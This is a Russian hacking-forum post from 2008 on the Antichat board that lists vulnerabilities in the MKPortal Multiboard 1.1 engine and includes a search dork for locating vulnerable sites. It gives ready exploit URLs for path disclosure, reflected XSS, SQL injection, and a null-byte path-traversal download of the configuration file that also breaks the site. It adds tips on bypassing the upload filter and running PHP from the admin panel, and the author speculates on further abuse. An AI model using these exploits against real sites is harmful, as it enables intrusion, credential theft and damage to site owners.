Форум АНТИЧАТ - Уязвимости движка MKPortal Multiboard 1.1

Уязвимости MKPortal Multiboard 1.1

18.12.2008, 06:01

Twoster

Reservists Of Antichat - Level 6

Регистрация: 20.08.2008

Сообщений: 328

Провел на форуме:
7144817

Репутация: 1503

Уязвимости MKPortal Multiboard 1.1

MKPortal Multiboard 1.1

Уязвимый продукт: MKPortal Multiboard 1.1
Дорк: "inurl:index.php?ind="

1. Расскрытие пути

Exploit:

Код:

/index.php?ind[]=news

/mkportal/admin/ad_menu.php

Вызов любого скрипта из папки blocks, например:
/mkportal/blocks/chat.php
/mkportal/blocks/random_pic.php
/mkportal/blocks/random_quote.php
/mkportal/blocks/search.php
В скрипты не инклудятся файлы, однако идет вызов сторонних функций

2. XSS

Код:

PHP код:


		
			
$return = "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."?".$_SERVER['QUERY_STRING']."#cal";

Exploit:

Код:

Множественные уязвимости из-за стандартного модуля - календарь
/index.php?"><script>alert()</script>
Либо любой линк подобного типа, например  
/index.php?ind=gallery&op=section_view"><script>alert()</script>

/mkportal/include/pmpopup.php?m1=<script>alert()</script>
/mkportal/include/pmpopup.php?m2=<script>alert()</script>
/mkportal/include/pmpopup.php?m3=<script>alert()</script>
/mkportal/include/pmpopup.php?m4=<script>alert()</script>

3. SQL-INJ

Exploit:

Код:

http://cms.ru/index.php?ind=news&op=del_comment&idcomm={SQL-INJ}
Скуль требует админских прав, посему толку мало.

4. Возможность скачать любые файлы, в том числе конфигурационные

Exploit:

Код:

/index.php?ind=downloads&op=download_file&ide=2&file=../../../conf_mk.php%00

Единственный косяк(а иногда плюс) - что при таком запросе запрашиваемый файл (../../../conf_mk.php)
переименовывается в

Цитата:

/modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk

PHP код:


		
			
...

$real_file = "mkportal/modules/downloads/file/mk_".$ide."_".$file;

...

if (is_file("mkportal/modules/downloads/file/".$file)) {

        @rename("mkportal/modules/downloads/file/".$file, $real_file);

      }

И вот в чем прикол, если запросить конфигурационный файл, мы его запросим на загрузку,
НО он переместится в папку mkportal/modules/downloads/file/,
и соответственно в корне его не будет => не будет работать движок...
(в принципе нужно подумать как это можно еще заюзать... можно также переместить какой нибудь
подключаемый файл и радоваться необъявленными переменными...)

5. Разные сведения и мысли

1. (.htaccess отсутствует напрочь везде)
2. (В index.php?ind=downloads&op=add_file запрещена загрузка php,
a phtml проходит, однако переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk)
3. Директория mkportal/modules/downloads/file/ как и многие другие доступна для листинга
4. Выполнение пхп кода в админке
http://cms.ru/mkportal/admin.php?ind=ad_blocks&op=blocks_new_php
(блоки->создание->Создать блок php, пишем код, нажимаем пимпу "Предпросмотр кода" )
5. Все эти баги работают не везде, поэтому есть мысль, что по просторам гуляют разные "Сборки" двига, а загрузка на официальном сайте сейчас прикрыта...

Последний раз редактировалось jokester; 15.11.2009 в 19:32..